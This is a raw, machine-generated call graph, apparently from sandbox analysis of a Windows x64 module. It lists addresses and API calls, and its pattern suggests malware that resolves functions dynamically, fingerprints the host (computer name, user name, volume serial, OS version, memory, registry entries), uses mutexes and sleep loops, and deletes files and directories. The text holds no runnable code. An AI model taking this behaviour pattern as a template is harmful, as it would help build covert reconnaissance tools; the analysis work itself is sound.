7ffe1150f98c abort 36 API calls 9295->9303 9307 7ffe11512ad4 9295->9307 9298 7ffe1151293d 9296->9298 9297 7ffe11510df0 abort LeaveCriticalSection 9297->9295 9301 7ffe1150eedc _invalid_parameter_noinfo 32 API calls 9298->9301 9299->9300 9302 7ffe1150f98c abort 36 API calls 9300->9302 9300->9304 9301->9291 9305 7ffe11512a36 9302->9305 9303->9307 9304->9295 9304->9297 9306 7ffe1150f98c abort 36 API calls 9305->9306 9306->9304 9307->9291 9308 7ffe1150f98c abort 36 API calls 9307->9308 9308->9291 9310 7ffe1150f98c abort 36 API calls 9309->9310 9311 7ffe115134db 9310->9311 9319 7ffe1151352d 9311->9319 9320 7ffe11510d9c EnterCriticalSection 9311->9320 9319->9268 9322 7ffe1150f98c abort 36 API calls 9321->9322 9323 7ffe115120cf 9322->9323 9325 7ffe115120ea 9323->9325 9332 7ffe11510d9c EnterCriticalSection 9323->9332 9327 7ffe11512170 9325->9327 9329 7ffe1150e500 abort 36 API calls 9325->9329 9327->9273 9329->9327 9334 7ffe1150c18a 9333->9334 9345 7ffe1150c12f 9333->9345 9335 7ffe1150c20e 9334->9335 9336 7ffe1150c18f 9334->9336 9394 7ffe1150c438 9335->9394 9338 7ffe1150c1f4 9336->9338 9339 7ffe1150c199 9336->9339 9382 7ffe1150c8c4 9338->9382 9341 7ffe1150c217 _vswprintf_s_l 9339->9341 9349 7ffe1150c17b _vswprintf_s_l 9339->9349 9388 7ffe1150c724 9339->9388 9344 7ffe11509540 _handle_error 8 API calls 9341->9344 9346 7ffe1150c397 9344->9346 9345->9335 9345->9339 9345->9341 9347 7ffe1150c15d 9345->9347 9348 7ffe1150c16b 9345->9348 9345->9349 9346->9223 9347->9335 9347->9348 9347->9349 9348->9341 9378 7ffe1150c67c 9348->9378 9349->9341 9402 7ffe1150ca68 9349->9402 9352 7ffe1150bf53 9351->9352 9353 7ffe1150bf6c 9351->9353 9354 7ffe1150c18a 9352->9354 9356 7ffe1150bf93 9352->9356 9368 7ffe1150c12f 9352->9368 9355 7ffe1150f22c _set_errno_from_matherr 15 API calls 9353->9355 9353->9356 9357 7ffe1150c20e 9354->9357 9358 7ffe1150c18f 9354->9358 9359 7ffe1150bf88 9355->9359 9356->9223 9361 7ffe1150c438 _vswprintf_s_l 45 API calls 9357->9361 9363 7ffe1150c1f4 9358->9363 9365 7ffe1150c199 9358->9365 9360 7ffe1150eedc _invalid_parameter_noinfo 32 API calls 9359->9360 9360->9356 9372 7ffe1150c17b _vswprintf_s_l 9361->9372 9362 7ffe1150c16b 9366 7ffe1150c67c _vswprintf_s_l 38 API calls 9362->9366 9374 7ffe1150c217 _vswprintf_s_l 9362->9374 9364 7ffe1150c8c4 _vswprintf_s_l 32 API calls 9363->9364 9364->9372 9367 7ffe1150c724 _vswprintf_s_l 32 API calls 9365->9367 9365->9372 9365->9374 9366->9372 9367->9372 9368->9357 9368->9362 9368->9365 9370 7ffe1150c15d 9368->9370 9368->9372 9368->9374 9369 7ffe11509540 _handle_error 8 API calls 9371 7ffe1150c397 9369->9371 9370->9357 9370->9362 9370->9372 9371->9223 9373 7ffe1150ca68 _vswprintf_s_l 38 API calls 9372->9373 9372->9374 9373->9374 9374->9369 9460 7ffe1150f260 9375->9460 9379 7ffe1150c6af _vswprintf_s_l 9378->9379 9381 7ffe1150c6e3 9379->9381 9406 7ffe1150f290 9379->9406 9381->9349 9384 7ffe1150c8ec _vswprintf_s_l 9382->9384 9383 7ffe1150f22c _set_errno_from_matherr 15 API calls 9385 7ffe1150c8f5 9383->9385 9384->9383 9387 7ffe1150c900 9384->9387 9386 7ffe1150eedc _invalid_parameter_noinfo 32 API calls 9385->9386 9386->9387 9387->9349 9389 7ffe1150c745 9388->9389 9390 7ffe1150f22c _set_errno_from_matherr 15 API calls 9389->9390 9393 7ffe1150c790 _vswprintf_s_l 9389->9393 9391 7ffe1150c785 9390->9391 9392 7ffe1150eedc _invalid_parameter_noinfo 32 API calls 9391->9392 9392->9393 9393->9349 9395 7ffe1150c45c 9394->9395 9418 7ffe1150b834 9395->9418 9401 7ffe1150c5a2 9401->9349 9404 7ffe1150cb15 _vswprintf_s_l 9402->9404 9405 7ffe1150ca8b 9402->9405 9403 7ffe1150f290 _vswprintf_s_l 38 API calls 9403->9405 9404->9341 9405->9403 9405->9404 9407 7ffe1150f2ba 9406->9407 9410 7ffe1150f2c4 9406->9410 9408 7ffe1150bb4c _vswprintf_s_l 36 API calls 9407->9408 9407->9410 9409 7ffe1150f2f7 9408->9409 9409->9410 9411 7ffe11512d64 _vswprintf_s_l 36 API calls 9409->9411 9410->9381 9412 7ffe1150f327 9411->9412 9413 7ffe1150f381 MultiByteToWideChar 9412->9413 9414 7ffe1150f330 9412->9414 9413->9410 9415 7ffe1150f36d 9413->9415 9414->9415 9417 7ffe1150f343 MultiByteToWideChar 9414->9417 9415->9410 9416 7ffe1150f22c _set_errno_from_matherr 15 API calls 9415->9416 9416->9410 9417->9410 9417->9415 9419 7ffe1150b870 9418->9419 9420 7ffe1150b861 9418->9420 9422 7ffe1150e440 _vswprintf_s_l 16 API calls 9419->9422 9427 7ffe1150b866 9419->9427 9421 7ffe1150f22c _set_errno_from_matherr 15 API calls 9420->9421 9421->9427 9423 7ffe1150b89c 9422->9423 9424 7ffe1150e400 __free_lconv_num 15 API calls 9423->9424 9426 7ffe1150b8b0 9423->9426 9424->9426 9425 7ffe1150e400 __free_lconv_num 15 API calls 9425->9427 9426->9425 9428 7ffe115105c0 9427->9428 9429 7ffe11510605 9428->9429 9430 7ffe115105ed 9428->9430 9429->9430 9434 7ffe1151061c _vswprintf_s_l 9429->9434 9431 7ffe1150f22c _set_errno_from_matherr 15 API calls 9430->9431 9432 7ffe115105f2 9431->9432 9433 7ffe1150eedc _invalid_parameter_noinfo 32 API calls 9432->9433 9444 7ffe1150c585 9433->9444 9438 7ffe1151064f 9434->9438 9439 7ffe11510670 9434->9439 9435 7ffe115107ac 9437 7ffe1150fbf0 _vswprintf_s_l 37 API calls 9435->9437 9436 7ffe11510773 9441 7ffe1150ff50 _vswprintf_s_l 37 API calls 9436->9441 9437->9444 9442 7ffe1151047c _vswprintf_s_l 37 API calls 9438->9442 9439->9435 9439->9436 9440 7ffe115106e9 9439->9440 9443 7ffe115106ad 9439->9443 9446 7ffe1151069f 9439->9446 9445 7ffe11513b40 _vswprintf_s_l 33 API calls 9440->9445 9441->9444 9442->9444 9447 7ffe11510344 _vswprintf_s_l 37 API calls 9443->9447 9444->9401 9453 7ffe1150bbdc 9444->9453 9448 7ffe11510713 9445->9448 9446->9436 9450 7ffe115106a8 9446->9450 9447->9444 9449 7ffe115135a4 _vswprintf_s_l 32 API calls 9448->9449 9451 7ffe11510740 9449->9451 9450->9440 9450->9443 9451->9444 9452 7ffe115101fc _vswprintf_s_l 36 API calls 9451->9452 9452->9444 9454 7ffe1150f148 _vswprintf_s_l 44 API calls 9453->9454 9455 7ffe1150bbf4 9454->9455 9456 7ffe1150bc08 9455->9456 9457 7ffe1150ef44 _vswprintf_s_l 40 API calls 9455->9457 9458 7ffe1150f148 _vswprintf_s_l 44 API calls 9456->9458 9457->9455 9459 7ffe1150bc10 9458->9459 9459->9401 9461 7ffe1150f279 _vswprintf_s_l 9460->9461 9464 7ffe1150e5fc 9461->9464 9465 7ffe1150e64f 9464->9465 9466 7ffe1150e629 9464->9466 9465->9466 9467 7ffe1150e65d 9465->9467 9468 7ffe1150f22c _set_errno_from_matherr 15 API calls 9466->9468 9469 7ffe1150bb4c _vswprintf_s_l 36 API calls 9467->9469 9470 7ffe1150e62e 9468->9470 9473 7ffe1150e66a 9469->9473 9471 7ffe1150eedc _invalid_parameter_noinfo 32 API calls 9470->9471 9484 7ffe1150bc8b 9471->9484 9472 7ffe11512be4 _vswprintf_s_l GetStringTypeW 9472->9473 9473->9472 9474 7ffe1150e6a1 9473->9474 9475 7ffe1150e90f 9474->9475 9476 7ffe1150f22c _set_errno_from_matherr 15 API calls 9474->9476 9478 7ffe1150f22c _set_errno_from_matherr 15 API calls 9475->9478 9480 7ffe1150ebe3 _vswprintf_s_l 9475->9480 9477 7ffe1150e953 9476->9477 9481 7ffe1150eedc _invalid_parameter_noinfo 32 API calls 9477->9481 9479 7ffe1150ebd8 9478->9479 9482 7ffe1150eedc _invalid_parameter_noinfo 32 API calls 9479->9482 9483 7ffe1150f22c _set_errno_from_matherr 15 API calls 9480->9483 9480->9484 9481->9475 9482->9480 9483->9484 9484->9223 9519 7ffe11509460 9485->9519 9488 7ffe11505d38 9562 7ffe11504dc0 9488->9562 9489 7ffe11505d27 9526 7ffe115050d0 9489->9526 9492 7ffe11505d36 9492->9114 9494 7ffe115050d0 61 API calls 9494->9492 9496 7ffe1150929f 9495->9496 9497 7ffe115092cc 9495->9497 9500 7ffe11507d50 10 API calls 9496->9500 9498 7ffe115092d6 9497->9498 9499 7ffe1150930a 9497->9499 9501 7ffe11507c50 10 API calls 9498->9501 9502 7ffe11509341 9499->9502 9503 7ffe11509314 9499->9503 9504 7ffe115092ab LoadLibraryW 9500->9504 9505 7ffe115092e2 GetProcAddress 9501->9505 9507 7ffe1150937f GetCommandLineW CommandLineToArgvW 9502->9507 9508 7ffe1150934b 9502->9508 9506 7ffe11507d50 10 API calls 9503->9506 9509 7ffe11507e50 2 API calls 9504->9509 9511 7ffe11507e50 2 API calls 9505->9511 9512 7ffe11509320 LoadLibraryW 9506->9512 9510 7ffe115093f8 9507->9510 9518 7ffe115093a0 9507->9518 9513 7ffe11507c50 10 API calls 9508->9513 9509->9497 9510->9117 9511->9499 9515 7ffe11507e50 2 API calls 9512->9515 9516 7ffe11509357 GetProcAddress 9513->9516 9514 7ffe115093ed LocalFree 9514->9510 9515->9502 9517 7ffe11507e50 2 API calls 9516->9517 9517->9507 9518->9514 9520 7ffe11507d50 10 API calls 9519->9520 9521 7ffe11509481 9520->9521 9522 7ffe11509260 19 API calls 9521->9522 9523 7ffe11509490 9522->9523 9524 7ffe11507e50 2 API calls 9523->9524 9525 7ffe11505d23 9524->9525 9525->9488 9525->9489 9527 7ffe11507d50 10 API calls 9526->9527 9528 7ffe1150512d GetVolumeInformationW 9527->9528 9529 7ffe11507e50 2 API calls 9528->9529 9530 7ffe11505180 GetComputerNameW GetComputerNameExW GetUserNameW 9529->9530 9531 7ffe115051f5 9530->9531 9599 7ffe115069f0 9531->9599 9534 7ffe11507c50 10 API calls 9535 7ffe11505291 9534->9535 9536 7ffe11507d50 10 API calls 9535->9536 9537 7ffe115052a2 9536->9537 9643 7ffe11505d60 9537->9643 9540 7ffe11505caf 9541 7ffe11507e50 2 API calls 9540->9541 9543 7ffe11505cbc 9541->9543 9544 7ffe11507e50 2 API calls 9543->9544 9546 7ffe11505cc6 9544->9546 9545 7ffe11505ca2 9680 7ffe11506980 GetProcessHeap RtlRestoreThreadPreferredUILanguages 9545->9680 9549 7ffe11509540 _handle_error 8 API calls 9546->9549 9547 7ffe11505c95 9679 7ffe11506980 GetProcessHeap RtlRestoreThreadPreferredUILanguages 9547->9679 9552 7ffe11505cd6 9549->9552 9550 7ffe11507d50 10 API calls 9558 7ffe1150533a 9550->9558 9552->9492 9553 7ffe11501f20 39 API calls 9553->9558 9554 7ffe11507e50 GetProcessHeap RtlRestoreThreadPreferredUILanguages 9554->9558 9555 7ffe11507d50 10 API calls 9556 7ffe11505c18 OpenMutexW 9555->9556 9557 7ffe11505c48 CloseHandle 9556->9557 9556->9558 9557->9558 9558->9545 9558->9547 9558->9550 9558->9553 9558->9554 9558->9555 9559 7ffe11505c78 GetTickCount SleepEx 9558->9559 9561 7ffe115054d8 9558->9561 9678 7ffe11506980 GetProcessHeap RtlRestoreThreadPreferredUILanguages 9558->9678 9559->9558 9563 7ffe11507d50 10 API calls 9562->9563 9564 7ffe11504e31 CreateMutexW 9563->9564 9565 7ffe11504e68 9564->9565 9566 7ffe11504e52 Sleep CloseHandle 9564->9566 9567 7ffe11507e50 2 API calls 9565->9567 9566->9565 9568 7ffe11504e72 9567->9568 9690 7ffe11506300 9568->9690 9570 7ffe11504e77 Sleep 9730 7ffe11504d80 GetTickCount 9570->9730 9573 7ffe11507d50 10 API calls 9574 7ffe11504eab 9573->9574 9575 7ffe11507d50 10 API calls 9574->9575 9576 7ffe11504eca 9575->9576 9577 7ffe11507d50 10 API calls 9576->9577 9578 7ffe11504ee5 9577->9578 9579 7ffe11507d50 10 API calls 9578->9579 9580 7ffe11504ef6 wcscat wcscpy 9579->9580 9735 7ffe11504270 9580->9735 9583 7ffe11504fb7 9585 7ffe11507e50 2 API calls 9583->9585 9584 7ffe11507d50 10 API calls 9593 7ffe11504f5b wcscat wcscpy 9584->9593 9586 7ffe11504fc1 9585->9586 9587 7ffe11507e50 2 API calls 9586->9587 9588 7ffe11504fcb 9587->9588 9589 7ffe11507e50 2 API calls 9588->9589 9590 7ffe11504fd5 9589->9590 9591 7ffe11507e50 2 API calls 9590->9591 9592 7ffe11504fdf 9591->9592 9594 7ffe11509540 _handle_error 8 API calls 9592->9594 9595 7ffe11504270 74 API calls 9593->9595 9596 7ffe11504ff3 9594->9596 9597 7ffe11504fa9 9595->9597 9596->9492 9596->9494 9598 7ffe11507e50 2 API calls 9597->9598 9598->9583 9600 7ffe11506a57 9599->9600 9601 7ffe11506a84 9599->9601 9602 7ffe11507d50 10 API calls 9600->9602 9603 7ffe11506ac2 9601->9603 9604 7ffe11506a8e 9601->9604 9605 7ffe11506a63 LoadLibraryW 9602->9605 9607 7ffe11506acc 9603->9607 9608 7ffe11506af9 9603->9608 9606 7ffe11507c50 10 API calls 9604->9606 9609 7ffe11507e50 2 API calls 9605->9609 9610 7ffe11506a9a GetProcAddress 9606->9610 9611 7ffe11507d50 10 API calls 9607->9611 9612 7ffe11506b37 9608->9612 9613 7ffe11506b03 9608->9613 9609->9601 9617 7ffe11507e50 2 API calls 9610->9617 9618 7ffe11506ad8 LoadLibraryW 9611->9618 9615 7ffe11506b75 9612->9615 9616 7ffe11506b41 9612->9616 9614 7ffe11507c50 10 API calls 9613->9614 9619 7ffe11506b0f GetProcAddress 9614->9619 9621 7ffe11506bac 9615->9621 9622 7ffe11506b7f 9615->9622 9620 7ffe11507c50 10 API calls 9616->9620 9617->9603 9623 7ffe11507e50 2 API calls 9618->9623 9624 7ffe11507e50 2 API calls 9619->9624 9625 7ffe11506b4d GetProcAddress 9620->9625 9627 7ffe11506bea memcpy_s 9621->9627 9628 7ffe11506bb6 9621->9628 9626 7ffe11507d50 10 API calls 9622->9626 9623->9608 9624->9612 9629 7ffe11507e50 2 API calls 9625->9629 9630 7ffe11506b8b LoadLibraryW 9626->9630 9633 7ffe11506bff RtlGetVersion 9627->9633 9631 7ffe11507c50 10 API calls 9628->9631 9629->9615 9634 7ffe11507e50 2 API calls 9630->9634 9632 7ffe11506bc2 GetProcAddress 9631->9632 9635 7ffe11507e50 2 API calls 9632->9635 9636 7ffe11506c6c GetSystemInfo 9633->9636 9637 7ffe11506c57 GetNativeSystemInfo 9633->9637 9634->9621 9635->9627 9638 7ffe11506c7f 9636->9638 9637->9638 9639 7ffe11506cf1 GetSystemMetrics 9638->9639 9640 7ffe11506c91 9638->9640 9639->9640 9641 7ffe11509540 _handle_error 8 API calls 9640->9641 9642 7ffe11505285 9641->9642 9642->9534 9644 7ffe11506890 4 API calls 9643->9644 9645 7ffe11505dac 9644->9645 9646 7ffe1150613e 9645->9646 9648 7ffe11506890 4 API calls 9645->9648 9647 7ffe11509540 _handle_error 8 API calls 9646->9647 9649 7ffe11505312 9647->9649 9650 7ffe11505dca 9648->9650 9649->9540 9668 7ffe11506160 9649->9668 9651 7ffe11506134 9650->9651 9653 7ffe11506890 4 API calls 9650->9653 9686 7ffe11506980 GetProcessHeap RtlRestoreThreadPreferredUILanguages 9651->9686 9654 7ffe11505de8 9653->9654 9655 7ffe1150612a 9654->9655 9656 7ffe11506890 4 API calls 9654->9656 9685 7ffe11506980 GetProcessHeap RtlRestoreThreadPreferredUILanguages 9655->9685 9658 7ffe11505e06 9656->9658 9659 7ffe11506120 9658->9659 9660 7ffe11506890 4 API calls 9658->9660 9684 7ffe11506980 GetProcessHeap RtlRestoreThreadPreferredUILanguages 9659->9684 9662 7ffe11505e24 9660->9662 9663 7ffe11506116 9662->9663 9681 7ffe11506950 GetProcessHeap RtlAllocateHeap 9662->9681 9683 7ffe11506980 GetProcessHeap RtlRestoreThreadPreferredUILanguages 9663->9683 9667 7ffe11505e3f 9682 7ffe11506980 GetProcessHeap RtlRestoreThreadPreferredUILanguages 9667->9682 9669 7ffe1150617f 9668->9669 9687 7ffe11506950 GetProcessHeap RtlAllocateHeap 9669->9687 9671 7ffe115061fc 9671->9558 9672 7ffe11506189 9672->9671 9688 7ffe11506950 GetProcessHeap RtlAllocateHeap 9672->9688 9674 7ffe115061be 9675 7ffe115061cb MultiByteToWideChar 9674->9675 9676 7ffe115061f2 9674->9676 9675->9676 9689 7ffe11506980 GetProcessHeap RtlRestoreThreadPreferredUILanguages 9676->9689 9678->9558 9679->9545 9680->9540 9681->9667 9682->9663 9683->9659 9684->9655 9685->9651 9686->9646 9687->9672 9688->9674 9689->9671 9793 7ffe11506210 9690->9793 9693 7ffe11507d50 10 API calls 9694 7ffe11506369 9693->9694 9695 7ffe11507d50 10 API calls 9694->9695 9696 7ffe1150637a 9695->9696 9697 7ffe11507d50 10 API calls 9696->9697 9698 7ffe1150638b 9697->9698 9699 7ffe11507d50 10 API calls 9698->9699 9700 7ffe1150639c 9699->9700 9701 7ffe11507d50 10 API calls 9700->9701 9702 7ffe115063ad 9701->9702 9703 7ffe115063d5 9702->9703 9704 7ffe115065ef 9702->9704 9706 7ffe11507d50 10 API calls 9703->9706 9705 7ffe11507e50 2 API calls 9704->9705 9707 7ffe115065f9 9705->9707 9708 7ffe115063ee 9706->9708 9709 7ffe11507e50 2 API calls 9707->9709 9710 7ffe11507d50 10 API calls 9708->9710 9711 7ffe11506603 9709->9711 9720 7ffe1150640d wcscat wcscpy 9710->9720 9712 7ffe11507e50 2 API calls 9711->9712 9713 7ffe1150660d 9712->9713 9714 7ffe11507e50 2 API calls 9713->9714 9715 7ffe11506617 9714->9715 9716 7ffe11507e50 2 API calls 9715->9716 9717 7ffe11506621 9716->9717 9718 7ffe11509540 _handle_error 8 API calls 9717->9718 9719 7ffe11506633 9718->9719 9719->9570 9721 7ffe1150647e ExpandEnvironmentStringsW ExpandEnvironmentStringsW 9720->9721 9722 7ffe115064c8 wcscat wcscpy 9721->9722 9723 7ffe1150651f DeleteFileW DeleteFileW 9722->9723 9724 7ffe1150654a wcscat wcscpy 9723->9724 9725 7ffe115065a1 DeleteFileW DeleteFileW RemoveDirectoryW RemoveDirectoryW 9724->9725 9726 7ffe11507e50 2 API calls 9725->9726 9727 7ffe115065e0 9726->9727 9728 7ffe11507e50 2 API calls 9727->9728 9729 7ffe115065ea 9728->9729 9729->9570 9851 7ffe1150cf18 9730->9851 9736 7ffe11504359 9735->9736 9737 7ffe11504384 9735->9737 9738 7ffe11507d50 10 API calls 9736->9738 9739 7ffe115043c2 9737->9739 9741 7ffe11507c50 10 API calls 9737->9741 9740 7ffe11504365 LoadLibraryW 9738->9740 9742 7ffe11504400 9739->9742 9743 7ffe11507c50 10 API calls 9739->9743 9745 7ffe11507e50 2 API calls 9740->9745 9746 7ffe1150439b GetProcAddress 9741->9746 9744 7ffe11504433 9742->9744 9748 7ffe11507d50 10 API calls 9742->9748 9747 7ffe115043d9 GetProcAddress 9743->9747 9752 7ffe11507c50 10 API calls 9744->9752 9755 7ffe1150447a 9744->9755 9745->9737 9749 7ffe11507e50 2 API calls 9746->9749 9750 7ffe11507e50 2 API calls 9747->9750 9751 7ffe11504414 LoadLibraryW 9748->9751 9749->9739 9750->9742 9753 7ffe11507e50 2 API calls 9751->9753 9754 7ffe1150444a GetProcAddress 9752->9754 9753->9744 9756 7ffe11507e50 2 API calls 9754->9756 9757 7ffe1150468a 9755->9757 9758 7ffe11507d50 10 API calls 9755->9758 9756->9755 9759 7ffe11509540 _handle_error 8 API calls 9757->9759 9760 7ffe115044cd wcscat 9758->9760 9761 7ffe1150469e 9759->9761 9762 7ffe11507e50 2 API calls 9760->9762 9761->9583 9761->9584 9763 7ffe115044f7 9762->9763 9764 7ffe1150450f 9763->9764 9765 7ffe1150453e 9763->9765 9767 7ffe11507d50 10 API calls 9764->9767 9766 7ffe11507d50 10 API calls 9765->9766 9768 7ffe1150454a wcscat 9766->9768 9769 7ffe1150451b wcscat 9767->9769 9771 7ffe11507e50 2 API calls 9768->9771 9770 7ffe11507e50 2 API calls 9769->9770 9772 7ffe1150453c 9770->9772 9773 7ffe1150456b GetModuleFileNameW 9771->9773 9772->9773 9774 7ffe115045a1 9773->9774 9774->9757 9775 7ffe11507d50 10 API calls 9774->9775 9776 7ffe115045b5 9775->9776 9777 7ffe115045c5 9776->9777 9778 7ffe11504662 9776->9778 9779 7ffe11507d50 10 API calls 9777->9779 9780 7ffe115085c0 28 API calls 9778->9780 9781 7ffe115045d1 9779->9781 9782 7ffe11504660 9780->9782 9783 7ffe11501cc0 swprintf 48 API calls 9781->9783 9784 7ffe11507e50 2 API calls 9782->9784 9785 7ffe11504611 9783->9785 9784->9757 9786 7ffe11507e50 2 API calls 9785->9786 9787 7ffe1150461e 9786->9787 9788 7ffe11507d50 10 API calls 9787->9788 9789 7ffe1150462a 9788->9789 9857 7ffe115085c0 9789->9857 9792 7ffe11507e50 2 API calls 9792->9782 9802 7ffe11508aa0 9793->9802 9795 7ffe115062f5 9795->9693 9796 7ffe115062eb 9815 7ffe11506980 GetProcessHeap RtlRestoreThreadPreferredUILanguages 9796->9815 9798 7ffe11507d50 10 API calls 9799 7ffe11506230 9798->9799 9799->9795 9799->9796 9799->9798 9801 7ffe11507e50 2 API calls 9799->9801 9810 7ffe11508940 9799->9810 9801->9799 9816 7ffe11508cf0 9802->9816 9804 7ffe11508cb9 9804->9799 9805 7ffe11508ab6 9805->9804 9850 7ffe11506950 GetProcessHeap RtlAllocateHeap 9805->9850 9807 7ffe11508cae CoTaskMemFree 9807->9804 9808 7ffe11508c99 CoTaskMemFree 9809 7ffe11508bc2 wcscpy 9808->9809 9809->9807 9809->9808 9811 7ffe11508cf0 20 API calls 9810->9811 9812 7ffe11508956 9811->9812 9813 7ffe11508a5e 9812->9813 9814 7ffe11508a69 Sleep 9812->9814 9813->9799 9814->9812 9815->9795 9817 7ffe11508d45 9816->9817 9818 7ffe11508d4a 9816->9818 9817->9805 9819 7ffe11508d81 9818->9819 9820 7ffe11507d50 10 API calls 9818->9820 9821 7ffe11508dbf 9819->9821 9824 7ffe11507c50 10 API calls 9819->9824 9823 7ffe11508d60 LoadLibraryW 9820->9823 9822 7ffe11508df6 9821->9822 9826 7ffe11507d50 10 API calls 9821->9826 9827 7ffe11508e34 9822->9827 9831 7ffe11507c50 10 API calls 9822->9831 9828 7ffe11507e50 2 API calls 9823->9828 9825 7ffe11508d97 GetProcAddress 9824->9825 9829 7ffe11507e50 2 API calls 9825->9829 9830 7ffe11508dd5 LoadLibraryW 9826->9830 9832 7ffe11508e72 9827->9832 9835 7ffe11507c50 10 API calls 9827->9835 9828->9819 9829->9821 9833 7ffe11507e50 2 API calls 9830->9833 9834 7ffe11508e0c GetProcAddress 9831->9834 9836 7ffe11507c50 10 API calls 9832->9836 9838 7ffe11508eb0 9832->9838 9833->9822 9839 7ffe11507e50 2 API calls 9834->9839 9840 7ffe11508e4a GetProcAddress 9835->9840 9842 7ffe11508e88 GetProcAddress 9836->9842 9837 7ffe11508ee7 9837->9817 9846 7ffe11507c50 10 API calls 9837->9846 9838->9837 9843 7ffe11507d50 10 API calls 9838->9843 9839->9827 9841 7ffe11507e50 2 API calls 9840->9841 9841->9832 9844 7ffe11507e50 2 API calls 9842->9844 9845 7ffe11508ec6 LoadLibraryW 9843->9845 9844->9838 9847 7ffe11507e50 2 API calls 9845->9847 9848 7ffe11508efd GetProcAddress 9846->9848 9847->9837 9849 7ffe11507e50 2 API calls 9848->9849 9849->9817 9850->9809 9852 7ffe1150f98c abort 36 API calls 9851->9852 9853 7ffe11504d99 9852->9853 9854 7ffe1150ceec 9853->9854 9855 7ffe1150f98c abort 36 API calls 9854->9855 9856 7ffe11504d9e 9855->9856 9856->9573 9858 7ffe11508cf0 20 API calls 9857->9858 9862 7ffe115085f5 memcpy_s 9858->9862 9859 7ffe115087ec wcscpy 9860 7ffe11509540 _handle_error 8 API calls 9859->9860 9861 7ffe1150464f 9860->9861 9861->9792 9862->9859 9864 7ffe11508f40 9862->9864 9865 7ffe11508fce 9864->9865 9866 7ffe11508fa1 9864->9866 9868 7ffe1150900c 9865->9868 9870 7ffe11507c50 10 API calls 9865->9870 9867 7ffe11507d50 10 API calls 9866->9867 9869 7ffe11508fad LoadLibraryW 9867->9869 9871 7ffe1150904a 9868->9871 9875 7ffe11507c50 10 API calls 9868->9875 9873 7ffe11507e50 2 API calls 9869->9873 9874 7ffe11508fe4 GetProcAddress 9870->9874 9872 7ffe11509081 9871->9872 9876 7ffe11507d50 10 API calls 9871->9876 9877 7ffe115090bf 9872->9877 9881 7ffe11507c50 10 API calls 9872->9881 9873->9865 9878 7ffe11507e50 2 API calls 9874->9878 9879 7ffe11509022 GetProcAddress 9875->9879 9880 7ffe11509060 LoadLibraryW 9876->9880 9882 7ffe115090fd 9877->9882 9887 7ffe11507c50 10 API calls 9877->9887 9878->9868 9883 7ffe11507e50 2 API calls 9879->9883 9885 7ffe11507e50 2 API calls 9880->9885 9886 7ffe11509097 GetProcAddress 9881->9886 9884 7ffe1150913b 9882->9884 9888 7ffe11507c50 10 API calls 9882->9888 9883->9871 9892 7ffe11507c50 10 API calls 9884->9892 9898 7ffe11509179 9884->9898 9885->9872 9889 7ffe11507e50 2 API calls 9886->9889 9890 7ffe115090d5 GetProcAddress 9887->9890 9891 7ffe11509113 GetProcAddress 9888->9891 9889->9877 9893 7ffe11507e50 2 API calls 9890->9893 9894 7ffe11507e50 2 API calls 9891->9894 9895 7ffe11509151 GetProcAddress 9892->9895 9893->9882 9894->9884 9896 7ffe11507e50 2 API calls 9895->9896 9896->9898 9897 7ffe11509241 9897->9859 9898->9897 9902 7ffe11506950 GetProcessHeap RtlAllocateHeap 9898->9902 9900 7ffe115091d3 9900->9897 9903 7ffe11506980 GetProcessHeap RtlRestoreThreadPreferredUILanguages 9900->9903 9902->9900 9903->9897 10464 7ffe11503b48 10465 7ffe11503b52 memcpy_s 10464->10465 10466 7ffe11503ba7 WSACleanup 10465->10466 10468 7ffe11503b89 inet_ntoa 10465->10468 10467 7ffe11503bad 10466->10467 10469 7ffe11507d50 10 API calls 10467->10469 10470 7ffe11503ba3 10468->10470 10471 7ffe11503bb9 RegOpenKeyExW 10469->10471 10470->10466 10472 7ffe11503d1d 10471->10472 10473 7ffe11503bf4 10471->10473 10474 7ffe11507e50 2 API calls 10472->10474 10475 7ffe11507d50 10 API calls 10473->10475 10476 7ffe11503d2a GlobalMemoryStatusEx 10474->10476 10485 7ffe11503c00 10475->10485 10477 7ffe11503d47 10476->10477 10479 7ffe11506890 4 API calls 10477->10479 10478 7ffe11503c19 RegEnumKeyExW 10480 7ffe11503c6c RegOpenKeyExW 10478->10480 10481 7ffe11503cd8 10478->10481 10483 7ffe11503d6a 10479->10483 10484 7ffe11503c9c RegQueryValueExW 10480->10484 10480->10485 10482 7ffe11507e50 2 API calls 10481->10482 10486 7ffe11503d0f RegCloseKey 10482->10486 10487 7ffe11503f3f 10483->10487 10494 7ffe11506950 GetProcessHeap RtlAllocateHeap 10483->10494 10484->10481 10488 7ffe11503cf2 RegCloseKey 10484->10488 10485->10478 10485->10481 10486->10472 10489 7ffe11509540 _handle_error 8 API calls 10487->10489 10488->10485 10491 7ffe11503f57 10489->10491 10493 7ffe11503d85 10495 7ffe11506980 GetProcessHeap RtlRestoreThreadPreferredUILanguages 10493->10495 10494->10493 10495->10487 10496 7ffe11505a48 10505 7ffe11503470 10496->10505 10499 7ffe11505b42 10500 7ffe11501f20 39 API calls 10501 7ffe11505b21 10500->10501 10502 7ffe11505b38 10501->10502 10520 7ffe11506980 GetProcessHeap RtlRestoreThreadPreferredUILanguages 10501->10520 10521 7ffe11506980 GetProcessHeap RtlRestoreThreadPreferredUILanguages 10502->10521 10506 7ffe115034d0 10505->10506 10507 7ffe1150352d 10506->10507 10508 7ffe11507f60 78 API calls 10506->10508 10522 7ffe11506950 GetProcessHeap RtlAllocateHeap 10507->10522 10508->10507 10510 7ffe1150353b 10511 7ffe115035b5 10510->10511 10512 7ffe115035a2 10510->10512 10519 7ffe11503604 10510->10519 10515 7ffe11507c50 10 API calls 10511->10515 10514 7ffe11507c50 10 API calls 10512->10514 10513 7ffe11509540 _handle_error 8 API calls 10516 7ffe115036c7 10513->10516 10517 7ffe115035ae 10514->10517 10515->10517 10516->10499 10516->10500 10518 7ffe11507e50 2 API calls 10517->10518 10518->10519 10519->10513 10520->10502 10521->10499 10522->10510 10555 7ffe1151094c 10565 7ffe115150ac 10555->10565 10566 7ffe115150b8 10565->10566 10588 7ffe11510d9c EnterCriticalSection 10566->10588 8203 7ffe115055ed 8212 7ffe115038a0 8203->8212 8206 7ffe115056a9 8209 7ffe1150569f 8299 7ffe11506980 GetProcessHeap RtlRestoreThreadPreferredUILanguages 8209->8299 8300 7ffe115074e0 8212->8300 8215 7ffe11503a47 8391 7ffe11509540 8215->8391 8220 7ffe11503902 memcpy_s 8390 7ffe11506980 GetProcessHeap RtlRestoreThreadPreferredUILanguages 8220->8390 8221 7ffe11501f20 8222 7ffe1150200b 8221->8222 8223 7ffe11502041 8221->8223 8224 7ffe11507d50 10 API calls 8222->8224 